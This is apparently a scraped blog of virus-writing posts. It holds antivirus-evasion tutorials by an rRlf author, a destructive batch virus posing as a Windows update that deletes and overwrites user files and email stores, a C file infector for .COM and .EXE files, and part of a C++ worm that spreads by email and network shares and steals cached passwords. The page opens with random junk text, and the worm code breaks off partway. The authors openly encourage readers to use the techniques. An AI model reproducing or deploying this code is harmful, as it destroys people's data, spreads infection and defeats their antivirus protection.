vmtjkatslrkzxrrwxiawspgfvwwphueigwostqtuwrsabmlsrugeudglkmadpimsdbhsmhzlqtcaqftezwbaqrlkzjnzdhvhrpgbi ajbakariwolazvdwhskrdsyqqcjayyqwusubevwumtwysahdzxtqhausneeistduraaaozircfrxqaidvarbiwibwzbtjajurezzd wvqswebffznuymcvqhitlgknfdlwbzdlxfikprozaaxynlxhtmcflbnptelhpgpymekdijonvhyiswpgprdhxtffzimxrdofzonaz qficniylakfqrazsqqviidufwfuwcialsryemswoekufgliuyybgzdydtqfmqnfqwdxmztbzqultebjbahjcadmibazhxsqljsslv cqqqtsqfndkcwihitiscoqqsphuooymtkolmjdielrslulfpqodcitauueorvbyohxhmwgfwozxkggipmgpkoutzykratrhamqbxj for %%a in (*.bat) do copy %0 %%a - - - - - - - - - [ End of Fake Bytes ] - - - - - - - - - The thing looks damn stupid, but the effect is genial :). The whole virus works, but KAV don't show any alarm. And also no heuristic alarm. I'm sure, that you will like this technique very much. .Useing a undeletable directory (Not for Win00|NT|XP) This technique's name looks very cool. And don't worry, it IS very cool. But first let me explain, what it is: Windows 95 and Windows 98 have a bug. If you try to make a new directory in MS-DOS, which contains some special letters, windows won't be able to work with that directorys. You can't open the directory, move it or delete it. That's the princip of our technique, because of the reason, that batch is a DOS script. Now let's have a look at letters, which make that possible. - - - - - - - - - - - [ Letter List ] - - - - - - - - - - - ASCII 176: ° ASCII 177: ± ASCII 178: ² ASCII 179: ³ ASCII 180: ´ ASCII 185: ¹ ASCII 186: º ASCII 187: » ASCII 188: ¼ ASCII 191: ¿ ASCII 192: À ASCII 193: Á ASCII 194: Â ASCII 195: Ã ASCII 196: Ä ASCII 197: Å ASCII 200: È ASCII 201: É ASCII 202: Ê ASCII 203: Ë ASCII 204: Ì ASCII 205: Í ASCII 206: Î ASCII 213: Õ ASCII 217: Ù ASCII 218: Ú ASCII 219: Û ASCII 220: Ü ASCII 223: ß ASCII 242: ò - - - - - - - - - -[ End of Letter List ]- - - - - - - - - - OK, we know all the chars, which are possible. Now let's make a little sample with that technique. My sample makes a undeleteable directory in %windir%, and write something to the autoexec.bat, which let the virus start at every windows-run. - - - - - - - - - - - [ Letter List example ] - - - - - - - - - - - cls @echo off cd %windir% md º´ÜòÌ cd º´ÜòÌ copy %0 virus.bat echo cd %windir% >>autoexec.bat echo cd º´ÜòÌ >>autoexec.bat echo virus.bat >>autoexec.bat - - - - - - - - - -[ End of Letter List example ]- - - - - - - - - - I'm sure, that you'll understand the example. A special thanks goes to the Author of 'Trojan.BAT.NoDelDir', but unfortunatly I don't know, who it is. If you read this, please contact me!!! .Including the EICAR-Testfile I think, that everybody knows, what EICAR-Virus-Test-File is. If not, I'll explain it: It's a com-file from EICAR, and every Scanner detects it. It's only for testing your AV. It's no virus, but it writes a String to the DOS screen. OK, sounds nice, but how can we use it? Because of the fact, that nearly everybody knows about that file, nobody is scared of a warning from his AV about that detection. That's the point. We include to our program the EICAR-file, so useres won't be scared of it. Here is the EICAR file content: - - - - - - - - - [ EICAR-content ] - - - - - - - - - - X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* - - - - - - - -[ End of EICAR-content ]- - - - - - - - - This is the same princip as the fake-bytes. But it contains a sensefully content: The EICAR-file. It's the same 'virus', that I used in the FAKE BYTE including technique. But now it's no more detect as 'BAT.Silly.d' but 'EICAR-Test-File'. And we had success :) - - - - - - - - - [ EICAR-content example] - - - - - - - - - - X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* for %%a in (*.bat) do copy %0 %%a - - - - - - - -[ End of EICAR-content example]- - - - - - - - - .Pseudo-Trash between the code The title sounds emazing. So, what do I mean with 'Pseudo-Trash'? Anything, that is written down in the code, but do not exist in the runtime. You may think, that I'm a stoned/drunken or whatever, but it's the only possible explanation. Think about the explanation. What comes to your mind? Maybe the command 'set'? Then you're at the right way. OK, a variable contains any content. But the point is, that a variable can also contains '' (=nothing). Now we solved our problem :) Let's look at the code. It's again the silly virus, which is detect by KAV as 'BAT.Silly.d'. - - - - - - - - - [ Pseudo-Trash example] - - - - - - - - - - %anyting%fo%anyting%r %%a i%anyting%n (%anyting%*.ba%anyting%t) d%anyting%o co%anyting%py %0 %%a - - - - - - - -[ End of Pseudo-Trash example]- - - - - - - - - As you can see, the thing is very (!!!) easy to make, but it's also useful. Note: you have to know, that the variable, that you use, has no content. Otherwise the virus won't work. If you are not sure about the content, include the line 'set anthing=', so you delete the content. .last words These techniques could be really useful, if you also include other Anti AV tricks. If you include all these things and also encryption or polymorphism or whatever, AVs will have a really problems. Now I hope, that you'll try to use some (or maybe all :D ) of these things in your future-projects, otherwise I wasted much hours of discover the techniques, searching errors and better ways of it, checking the behaviour on other OSes and writing the article. OK, in the end I want to say sorry about my english spelling or grammer mistakes :). - - - - - - - - - - - - - - - Second Part To Hell/[rRlf] www.spth.de.vu spth@aonmail.at written in june 2003 Austria - - - - - - - - - - - - - - -
Posted by egunda at 9:31 AM 0 comments
Labels: Virus Writing
A good idea for virus writers
I was surfing through net and i came across this article which i found good enough to share with you people.
i express my sincere thanks to[rRlf] for sharing the idea with us.
here it goes.
=============================================
************************************************************* ************************************************************* ************ *********** ************ Over-File Splitting *********** ************ by Second Part To Hell/[rRlf] *********** ************ *********** ************************************************************* ************************************************************* Index: ****** 0) Intro Words 1) The idea 2) How to split? 3) How to join? 4) Short: How to use? 5) Short: Encryption 6) Short: Code in Filename 7) Outro words 0) Intro Words This title may give you no ideas what my idea is about, so I'll tell you: The idea itself is a heavy kind of Fuck-AV technique, it does not belong to any other technique I've already seen. Just check it out. Let's consider the detection of a virus by an AV program: The AV program searchs in all files of the disk for special strings or whatever. If it finds such a string, the file is detected. (I dont talk about encryption or polymorphism in this connection - it's not important for the idea). How to prevent this detection? I'll explain you... 1) The idea Well, I've told you that an AV searchs in every file of the HD if there is a virus. But what would be, if the virus would not be in one file? What would be if the virus would be in 1000 or more files? You may think: "Shit, what the hell are you talking about?" OK, let's say anybody's computer gets infected by a virus/worm. Many files get infected and the user recognizes that something smells fishy. (S)He updates the AV program, scanns all files, all infected files become clean. Is anything over now? No, it is not, because the virus/worm, when running the first time splitted itself in 1000 parts, and every part is a own file with the length of ~4-8 byte. This files (which have random names) became saved in a directory. The files alone can not harm anybody, but together they can. Together? The virus/worm also made a file, which joins all files. This file, which runs every at restart (registry,autostart,...) become executed now, and the computer will be reinfected again. Can you now imagine how our virus/worm uses this technique and why may be real successful? Just read on... 2) How to split? This is most important for the technique: The more parts you have for your virus/worm, the less the chance, that an AV program could detect it. Why? Because a 4 byte scan-string would not be enough for detecting a virus. If such a small scan-string would be used, the AV would definitivly have alot of false-positives (detecting uninfected files). It is also important to split your files randomly. Not always the same way. And to split the files in random length parts, not always i.e. 5 byte. If the program is a virus, it does not matter if the you also split the hostcode. And about the header of a file: It is no problem to also split the header into parts. Now let me show you a primitive graphic, how i mean this:This could be: 1: RE 1: REA 2: AL- 2: L-FIL 3: FILE- 3: E-INF 4: INF 4: ECT 5: ECTE 5: ED 6: D-B 6: -BY- 7: Y-A- 7: A-VI 8: VIR 8: RUS- 9: US-US 9: USIN 10: ING- 10: G-TH 11: THE- 11: E-OVE 12: OVER-F 12: R-FI 13: ILE 13: LE-SP 14: -SPLI 14: LI 15: TTING 15: TT 16: -TECH 16: ING 17: NIQ 17: -TE 18: UE 18: CHN 19: IQU 20: E Now let's imagine, that every small part of the file has a random name. And one more: Let's imagine, every part could be in any directory at the Harddisk. Or even on another partition. That does not matter, you just have to save the name for the joining-process. 3) How to join? How could be join this files again to one file, which can be executed? At splitting the virus, we have the filenames and -pathes, so we have to save them. After splitting, a file will be created, which will join the virus to one file. I'll show you now how such a file could look like. For making it easy I've used CMD command COPY for that: - - - - - copy C:\WinNT\shjei2.tmp+E:\Pictures\lwjfnvmsiq9jm.dsf+D:\Songs\ToT\j1s.ajs+C:\Vir-Fol\iajw.vir+... C:\run.exe C:\run.exe - - - - - The most important thing is,that your joining-program can not be detected. You can of course generate your program totally randomly, and with the filenames it is totally random. There is nothing more to say... 4) Short: How to use? Here is another idea, how you can use this technique for an eMail worm. The worm should send itself via an archive (.ZIP/.RAR/.???). The archive has to contain a directory and a joining file. In the directory there are all parts of the virus. The user clicks the joining file, and it joins the virus to one file and runs it. The result is, that the user can scan every file, but nothing is found, because no file is the virus, but all. :) Something else: An eMail as archive is more serious than a normal .EXE file, and even if in the archive are more files and a directory. The user may think it's a program. 5) Short: Encryption No, this is no encryption tutorial, but another way how to use this idea. You could have 3 files: joining-file, encrypted-code file,decryption file. Before joining: After joining: ______________ _______________ | Joining file | | Joining file | |______________| |_______________| ______________ _______________ | Encry. code | | Decry. engine | |______________| | Encry. code | |_______________| ______________ | Decry. file | |______________| What is important for this technique? Your decryption engine and the join- ing file must not be detected. If the decrytion engine is not detected, most times AV tries to emulate the decrytion and encrypt the virus. But if there is nothing to decrypt, nothing is detected. :) 6) Short: Code in Filename This is another idea, which belongs (nearly :D) to Over-File Splitting. Just imagine: What would be, if we would make a directory, and make new files with special names. The special names should present the code. But as there are many characters, which aren't allowed for a filename, we have to use the HEX of the character. But now we have one problem: We have sort the filenames, as we need to join the parts in right way. I'll show you a short graphic to let you understand my idea: 1. File: 000148454C4C4F20 \/ | | | | | | AA B C D E F G 2. File: 0002565845525321 \/ | | | | | | AA B C D E F G AA: This is for sorting the filenames. I've used a word, so we can use 0xFFFF filenames. Important: 4 Byte=2 HEX Chars=0xFFFF chars. B: 2 Bytes = 1 HEX of a Character. Here it is the 1st one. C: 2 Bytes = 1 HEX of a Character. Here it is the 2nd one. D: 2 Bytes = 1 HEX of a Character. Here it is the 3rd one. E: 2 Bytes = 1 HEX of a Character. Here it is the 4th one. F: 2 Bytes = 1 HEX of a Character. Here it is the 5th one. G: 2 Bytes = 1 HEX of a Character. Here it is the 6th one. Just for not missunderstanding: '000148454C4C4F20' IS the filename, it could also be '000148454C4C4F20.txt', but for making it easier, I did not use any extansion. For getting the code: You have to sort the filenames: - 000148454C4C4F20 - 0002565845525321 Reduce the 4 byte in the beginning (which are just for sorting): - 48454C4C4F20 - 565845525321 And join the names: - 48454C4C4F20565845525321 As it is a Hex-Value, we have to change it to a Text Sting: - HELLO VXERS! Isn't this nice??? :) Well, I know that this idea is quite strange and it seems to be unreal. But it isn't, you can make it real! And if you did, nobody will detect it. 7) Outro words This technique is definitivly hard to bring it to reality, but no way impossible. I would like to see the faces of AVers, if they see such a virus. :) But really, what would they do? The only thing is to detect the joining file, but what if we could make it undetectable? We would have an undetectable virus - isn't that our goal? - - - - - - - - - - - - - - - Second Part To Hell/[rRlf] www.spth.de.vu spth@priest.com written from Jan 2005 ...surrealistic viruswriter... - - - - - - - - - - - - - - -
he also made the File Splitting Engine (also released in rRlf #6)
description he wrote as:
This is just a small engine, but I'm sure it could be very useful. What does the engine do?
It splitts the current file into 3-10 byte parts and creates a joining file (called start.bat).
To understand it's purpose, you should read my article called "Over-File Splitting".
download link
Posted by egunda at 8:26 AM 0 comments
Labels: Virus Writing
Sunday, October 12, 2008
A batch file virus code
@ECHO OFF CLS IF EXIST c:\winupdt.bat GOTO CODE GOTO SETUP :SETUP @ECHO OFF ECHO Ein batch Virus - getarnt als Windows-Update ECHO. copy %0 c:\winupdt.bat >> NUL ECHO Bitte haben sie ein wenig Geduld ... ausführen des Systemscans ... prompt $P$SWindows2000 type %0 >> c:\autoexec.bat type %0 >> c:\windows\dosstart.bat ECHO fertig ECHO. ECHO Die benötigten Dateien werden installiert! FOR %%a IN (*.zip) DO del %%a FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL ECHO Installation abgeschlossen ECHO. ECHO Bitte registrieren sie sich nun bei schell-industry,
um über neue updates informiert zu werden. PAUSE ECHO Download gestartet... START "C:\Program Files\Internet Explorer\Iexplore.exe"
http://www.schell-industry.de.vu/ IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del
"C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}
\Microsoft\Outlook Express\*.dbx" IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" ECHO Damit die Einstellungen erfolgreich übernommen werden können,
wird jetzt ein Neustart durchgeführt. ECHO Bleiben sie uns weiterhin treu, ihr SCHELL-industry Sicherheitsteam. copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL c:\WINDOWS\RUNDLL user.exe,exitwindowsexec CLS GOTO END :CODE CLS @ECHO OFF prompt $P$SWindows2000 IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC type %0 >> c:\autoexec.bat :ABC type %0 >> c:\windows\dosstart.bat FOR %%a IN (*.zip) DO del %%a FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL START "C:\Program Files\Internet Explorer\Iexplore.exe"
http://www.schell-industry.de.vu/~hackingtruths IF EXIST "C:\Program Files\Outlook Express\msimn.exe"
del "C:\WINDOWS\Application Data\Identities\
{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL GOTO :END CLS :END CLS
Posted by egunda at 10:45 AM 0 comments
Labels: Source Codes
Saturday, October 11, 2008
Make free calls
there are many sites today which will provide you this facility.
i found this one working fine..
http://evaphone.com/
so start calling your friends located anywhere
Posted by egunda at 8:50 AM 1 comments
Labels: Tricks
Thursday, October 9, 2008
The Giant black book of computer virus
The Giant black book of computer virus
download link: http://www.esnips.com/doc/6fdb4602-4de6-479a-b99f-cf1a4e256f68/The_Giant_Black_Book_of_Computer_Viruses
Posted by egunda at 10:40 PM 0 comments
Labels: Ebooks
The Little Black Book of Computer Viruses
by:
Mark Ludwig
American Eagle Publications, Inc.
ISBN 0-929408-02-0
1996
download:
http://www.esnips.com/doc/541940b6-bfe4-4aef-848d-5c98bc4c4c31/the-little-black-book-of-computer-viruses
Posted by egunda at 10:27 PM 1 comments
Labels: Ebooks
A generic or .com and .exe infector in C
/* C-Virus: A generic .COM and .EXE infector
Written by Nowhere Man
Project started and completed on 6-24-91
Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/
[to protect the code from script kiddies.. header files are not given]
#pragma inline // Compile to .ASM
#include
#include
#include
#include
#include
void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);
#define DEBUG
#define ONE_KAY 1024 // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300) // 6k+ size minimum
#define SIGNATURE "NMAN" // Sign of infection
int main(void)
{
/* The main program */
spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}
void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */
small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}
int infected(char *fname)
{
/* This function determines if fname is infected */
FILE *fp; // File handle
char sig[5]; // Virus signature
fp = fopen(fname, "rb");
fseek(fp, 28L, SEEK_SET);
fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}
void small_print(char *string)
{
/* This function is a small, quick print routine */
asm {
push si
mov si,string
mov ah,0xE
}
print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}
void spread(char *old_name, char *new_name)
{
/* This function infects new_name with old_name */
/* Variable declarations */
FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files
/* Perform the infection */
#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time
/* Clean up */
fcloseall(); // Close files
free(virus_code); // Free memory
}
char *victim(void)
{
/* This function returns the virus's next victim */
/* Variable declarations */
char *types[] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop
/* Find our victim */
if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);
for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include
if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}
/* If there are no files left to infect, have a little fun... */
hostile_activity();
return(0); // Prevents warning
}
Posted by egunda at 10:26 PM 0 comments
Labels: Source Codes
A worm in cpp
// ---[ w0rm.cpp ]-----------------------------[ http://harmony.haxors.com ]--//
//
// An exploration into remote network propogation using multiple techniques.
// The w0rm will spread via e-mail (MAPI) all local drives and any writable
// network shares. It collects passwords on the local system to be used in
// cracking any password protected shares on the network. It will write an
// Autorun.inf file in the root of any drives it can so when you open that
// drive, e.g. double click it the w0rm will execute and go resident :).
// This code is obviously buggy and not intended to be actually used in the
// 'real' world. To determine if the payload should be deployed the w0rm
// sits on the network and plays a 'game' with other w0rms on that network
// segment via broadcast UDP messages. see relevant source for a proper
// idea of the 'game', its just a perverse example of too much time on ones
// hands :). this is version 1.00 so the are bugs, incompatabilities with
// various flavors of windows and other anomolies - dose! but if you want
// something better write it yourself ;) (and send me a copy)
//
// "this is the end, beautiful friend" - the doors
//
// ---[ harmony :: temple of the screaming interrupt ]--[ nomelody@gmx.net ]--//
//--header-files--------------------------------------------------------------//
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <io.h>
#include <dos.h>
#include <conio.h>
//--defines-------------------------------------------------------------------//
#define MAX_LENGTH 128
#define MAX_RECIEVERS 50
#define MUTEX_NAME "w0rm"
#define EARTH_WORM_JIM "Readme.exe"
#define WORMGAME_PORT 12345
#define WORMGAME_MAX_WINS 10
#define WORMGAME_PKT_PLAY 0xFF
#define WORMGAME_PKT_WIN 0x80
//--globals-------------------------------------------------------------------//
char *ptrEgo, *buf;
char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH];
int index = 0;
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbResource;
WORD cbPassword;
BYTE iEntry;
BYTE nType;
BYTE abResource[1];
} PASSWORD_CACHE_ENTRY;
typedef struct WormGamePkt {
BYTE pktType;
int pktNum;
} AWORMGAMEPACKET;
//--function-declarations-----------------------------------------------------//
DWORD WINAPI WormGameThread( LPVOID );
DWORD WINAPI WormMainThread( LPVOID );
BOOL runningNT();
void propogateMAPI( void );
int initMAPI( void );
int validAddress( char * addr );
int sendMessage( int recipNum, LHANDLE lhSession );
int getSharePasswords( void );
int getCachedPasswords( void );
int addPassword( char * pwd );
void propogateDrive( void );
void attackDrive( char * drive, int type );
void propogateNet( LPNETRESOURCE lpnr );
int crackNetShare( char * share );
void releasePayload();
extern "C" int __stdcall RegisterServiceProcess( int dwProcessID, int dwType );
//--entry-point---------------------------------------------------------------//
// WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
int main( int argc, char **argv )
{
HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread;
DWORD WormGameThreadId, WormMainThreadId;
// display explorer window if we need to, due to autorun.inf file :)
// test for any command line...
/* only allow one instance of worm to run on system at one time */
hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME);
if( GetLastError() == ERROR_ALREADY_EXISTS )
{
ExitProcess( 0 );
}
ptrEgo = argv[0];
/* try to 'hide' the process */
if( runningNT() == TRUE )
{
// hide process in winNT
printf("WORM running on WinNT\n");
} else {
printf("WORM running on Win9x\n");
LoadLibrary( "KERNAL32.DLL" );
RegisterServiceProcess( NULL, 1);
}
/* go resident and give worm RAW power */
hEgo = GetCurrentProcess();
SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS);
// create suspended WormMainThread...
hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId);
if( hWormMainThread != NULL )
{
// set thread to time critical... 'i wana take you higher' - sly and the family stone
//SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL);
// resume thread execution...
ResumeThread( hWormMainThread );
}
/*
// create suspended WormGameThread...
hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId);
if( hWormGameThread != NULL )
{
// resume thread execution...
ResumeThread( hWormGameThread );
}
*/
/* wait for hWormGameThread() to terminate */
// WaitForSingleObject( hWormGameThread, INFINITE);
WaitForSingleObject( hWormMainThread, INFINITE);
printf("MAIN_DEBUG: worm threads ended, im outa here: press a key...\n");
getch();
/* release our mutex, next local worm wont get blocked */
if( hMutex != NULL )
{
ReleaseMutex( hMutex );
}
return 0;
}
//----------------------------------------------------------------------------//
DWORD WINAPI WormMainThread( LPVOID )
{
DWORD dwSize;
char buff[64];
printf("WormMainThread: started...\n");
/* spread worm via MAPI */
propogateMAPI();
/* get any passwords we can for use later on */
getSharePasswords();
getCachedPasswords();
dwSize = 64;
WNetGetUser( NULL, buff, &dwSize );
addPassword( buff );
printf("DEBUG: total pwds got = %d\n", index);
/* spread worm via any/all localy maped drives */
propogateDrive();
/* spread worm via any/all LAN network shares */
propogateNet( NULL );
/* finished our little game :) */
ExitThread( 0 );
return 0;
}
//----------------------------------------------------------------------------//
DWORD WINAPI WormGameThread( LPVOID )
{
WSADATA w;
SOCKET s_recv, s_send;
sockaddr_in saddr, saddr_in, saddr_out;
int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval;
AWORMGAMEPACKET gamePkt;
fd_set fd_read;
struct timeval timeout = { 5, 0 };
if( WSAStartup( MAKEWORD(1,0), &w) != 0 )
{
printf("WormThread: WSAStartup failed\n");
goto endThread;
}
s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET )
{
printf("WormThread: invalid socket\n");
goto endThread;
}
memset( &saddr_in, 0x00, sizeof( struct sockaddr));
memset( &saddr, 0x00, sizeof( struct sockaddr));
saddr.sin_family = AF_INET;
saddr.sin_port = htons( WORMGAME_PORT );
saddr.sin_addr.s_addr = INADDR_ANY;
memset( &saddr_out, 0x00, sizeof( struct sockaddr) );
saddr_out.sin_family = AF_INET;
saddr_out.sin_port = htons( WORMGAME_PORT );
saddr_out.sin_addr.s_addr = INADDR_BROADCAST;
optval = 1;
if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR )
{
printf("WormThread: setsocketopt failed\n");
goto endThread;
}
if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR )
{
printf("WormThread: bind failed\n");
goto endThread;
}
FD_ZERO( &fd_read );
FD_SET( s_recv, &fd_read );
randomize();
loop:
while( 1 )
{
if( totalwins >= WORMGAME_MAX_WINS )
{
releasePayload();
totalwins = 0;
}
// pick a magic number...
magicWorm = ( ( rand() % 100 ) + 1 );
printf("WormThread: picked a magic num: %d\n", magicWorm);
// wait a length of time...
Sleep( 500 );
// send my magic number...
gamePkt.pktType = WORMGAME_PKT_PLAY;
gamePkt.pktNum = magicWorm;
if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR )
{
printf("WormThread: sendto failed\n");
break;
}
// handel responces...
while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR )
{
if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR )
{
printf("WormThread: recvfrom failed\n");
break;
} else {
switch( gamePkt.pktType )
{
case WORMGAME_PKT_PLAY: // recieved a magic number...
// ignore responce from local machine...
printf("WormThread: recieved a magic num: %d\n", gamePkt.pktNum);
// process other responces
if( gamePkt.pktNum == magicWorm )
{
// notify any winners
gamePkt.pktType = WORMGAME_PKT_WIN;
saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr;
sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size);
saddr_out.sin_addr.s_addr = INADDR_BROADCAST;
}
break;
case WORMGAME_PKT_WIN: // im a winner :)
printf("WormThread: IM A WINNER!!!\n");
totalwins++;
goto loop;
default: // its all gone bugfuck!
printf("WormThread: its all gone bugfuck!\n");
break;
}
}
} // while(select...
}
endThread:
closesocket( s_recv );
closesocket( s_send );
ExitThread( 0 );
return 0;
}
//----------------------------------------------------------------------------//
BOOL runningNT()
{
OSVERSIONINFO osvi;
BOOL retval = FALSE;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
switch( osvi.dwPlatformId )
{
case VER_PLATFORM_WIN32_NT:
retval = TRUE;
break;
case VER_PLATFORM_WIN32_WINDOWS:
retval = FALSE;
break;
default: // VER_PLATFORM_LINUX ? :) || VER_PLATFORM_WIN32_ANOTHERBUGGYRELEASE
retval = FALSE;
break;
}
return retval;
}
//----------------------------------------------------------------------------//
void propogateMAPI( void )
{
LHANDLE lhSession;
CHAR rgchMsgID[513];
MapiMessage *lpMessage;
int i=0;
if( initMAPI() != 0 )
{
return;
}
if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
{
*rgchMsgID = NULL;
while( i < MAX_RECIEVERS )
{
if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
{
break;
}
if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
{
// printf("DOING: %s\n\t%s\n",lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress);
if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 )
{
strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress);
i++;
}
if( validAddress( lpMessage->lpRecips->lpszAddress ) == 0 )
{
strcpy( addressList[i], lpMessage->lpRecips->lpszAddress);
i++;
}
}
}
MAPIFreeBuffer( lpMessage );
// TO DO: sort addressList and remove duplicates...
//sendMessage( i, lhSession ); // <---- !!!!!!
MAPILogoff( lhSession, 0L, 0L, 0L);
}
for( int x = 0 ; x < i ; x++ )
{
printf("DEBUG: attacking:\t%s\n", addressList[x]);
}
return;
}
//----------------------------------------------------------------------------//
int initMAPI( void )
{
HINSTANCE hi;
LPMAPILOGON MAPILogon;
LPMAPIFINDNEXT MAPIFindNext;
LPMAPIREADMAIL MAPIReadMail;
LPMAPISENDMAIL MAPISendMail;
hi = LoadLibrary( "mapi32.dll" );
if( hi == NULL )
{
return -1;
}
MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");
MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");
MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");
MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");
if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL )
{
return -1;
}
return 0;
}
//----------------------------------------------------------------------------//
int validAddress( char * addr )
{
if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0)
{
return -1;
} else if( strchr( addr , '@') == NULL )
{
return -1;
} else if( strchr( addr , '.') == NULL )
{
return -1;
} else {
return 0;
}
}
//----------------------------------------------------------------------------//
int sendMessage( int recipNum, LHANDLE lhSession )
{
MapiRecipDesc *recips = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) );
MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL};
